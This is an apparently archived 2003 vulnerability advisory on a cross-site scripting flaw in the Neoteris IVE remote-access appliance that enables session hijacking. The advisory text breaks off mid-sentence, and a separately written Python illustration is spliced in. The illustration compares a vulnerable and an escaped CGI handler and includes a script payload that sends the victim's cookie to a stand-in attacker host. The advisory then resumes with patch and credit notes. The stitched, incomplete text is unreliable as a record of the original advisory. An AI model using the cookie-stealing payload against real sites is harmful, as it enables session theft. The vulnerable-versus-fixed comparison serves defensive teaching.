TUCoPS :: Network Appliances :: bt168.txt

XSS In Neoteris IVE Allows Session Hijacking

Note to Moderator:

In light of some recent cross-site scripting posts allowed through to Bugtraq recently, I would be grateful
if you would pass this one on to the list....thanks.  -d.

Security Advisory

Advisory Title: Cross-Site Scripting (XSS) in Neoteris IVE Allows Session Hijacking 
Release Date: May 13, 2003 
Product: Neoteris Instant Virtual Extranet (IVE), Versions 3.01 and Prior 
Overall Risk: Medium 
CVE Candidate: CAN-2003-0217 


Neoteris Instant Virtual Extranet (IVE) is an appliance-based remote access solution that is 
accessed via a standard web browser. The Neoteris IVE is one of the better known "clientless 
VPN" solutions, and boasts an impressive, growing list of customers (see for more information). Once authenticated to the remote network via the 
IVE, a user can in principle reach any internal resource that the Neoteris box has been 
configured to expose. 

Quoting from the company website, "The Neoteris IVE has always provided a means to remote access 
with a dramatically lower Total Cost of Ownership vs. traditional methods like VPN or dial. The 
IVE also enhances security, by eliminating open-ended, network layer connections. The security of 
the IVE has been verified by a several well-known independent security authorities." 


A cross-site scripting (XSS) vulnerability exists in Neoteris IVE v3.01 and prior. A CGI script 
on the appliance does not properly validate one of its arguments, so attacker-supplied content is 
echoed into the page served to the user. It has been confirmed that exploiting this 
vulnerability can lead to a legitimate user's session being hijacked, bypassing any 

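The bug class above, as an added illustration that is not code from the advisory or from the Neoteris product: a CGI handler that reflects a request argument into HTML verbatim, beside a hardened version that HTML-escapes it. The script, the parameter name "dest", the payload and the attacker host are hypothetical constructions for the example; the advisory does not name the affected IVE script or argument.

```python
"""Reflected XSS in a CGI-style handler, vulnerable form beside fixed form.

Everything here is constructed for illustration: the parameter name, the
error page and the payload are NOT the real Neoteris IVE endpoint.
"""
import html
from urllib.parse import parse_qs, urlencode

# Constructed attacker value. A real payload would send document.cookie to a
# host the attacker controls; attacker.example is a placeholder name.
PAYLOAD = (
    '<script>new Image().src='
    '"http://attacker.example/?c="+document.cookie</script>'
)


def render_vulnerable(query_string: str) -> str:
    """Echo the 'dest' argument into the page without escaping (the flaw)."""
    params = parse_qs(query_string)
    dest = params.get("dest", [""])[0]
    return f"<html><body>Error: cannot reach {dest}</body></html>"


def render_fixed(query_string: str) -> str:
    """Same page, but the argument is HTML-escaped before it is reflected.

    quote=True also escapes quotes so the value cannot break out of an
    attribute if it is ever reflected inside one.
    """
    params = parse_qs(query_string)
    dest = params.get("dest", [""])[0]
    safe = html.escape(dest, quote=True)
    return f"<html><body>Error: cannot reach {safe}</body></html>"


def reflects_script(page: str) -> bool:
    """Crude check: does a raw <script> tag survive into the response?"""
    return "<script>" in page


def demo() -> tuple:
    """Return (vulnerable_page_executes_payload, fixed_page_executes_payload)."""
    qs = urlencode({"dest": PAYLOAD})  # what the victim's browser would send
    return reflects_script(render_vulnerable(qs)), reflects_script(render_fixed(qs))


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable handler executes payload:", vulnerable)
    print("fixed handler executes payload:", fixed)
```

Output encoding at the point of reflection is the fix; input "validation" alone is fragile because the set of dangerous characters depends on where the value lands in the page. Marking the session cookie HttpOnly keeps document.cookie out of reach of injected script, but it is a mitigation, not a substitute: script running in the victim's origin can still drive the application with the victim's session directly.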

I would like to thank Neoteris for their cooperation in developing a remediation for this 
vulnerability. A patch has been released for v3.01 and prior. In addition, this issue has been 
fixed in v3.1. Patch and new version release information is available for customers at 

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2003-0217 to this
issue. This is a candidate for inclusion in the CVE list (, which 
standardizes names for security problems. 

Special thanks to DW (shall I say greetz?) for his invaluable help with these issues. 

- Dave Palumbo 

